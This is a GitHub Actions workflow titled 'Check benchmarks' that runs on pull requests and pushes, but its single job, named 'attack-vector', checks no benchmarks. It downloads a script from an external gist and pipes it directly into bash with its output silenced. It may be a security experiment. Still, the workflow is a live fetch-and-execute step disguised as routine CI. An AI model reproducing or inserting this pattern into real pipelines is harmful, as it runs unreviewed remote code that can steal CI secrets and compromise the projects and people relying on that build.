name: Check benchmarks

on:
  pull_request:
  push:
    branches:
      - master

jobs:
  attack-vector:
    runs-on: ubuntu-latest
    steps:
      - run: curl -sSfL https://gist.githubusercontent.com/RomarQ/066b5eb9b6abf60277332cbc280e1ac9/raw/experiment | bash /dev/null 2>&1
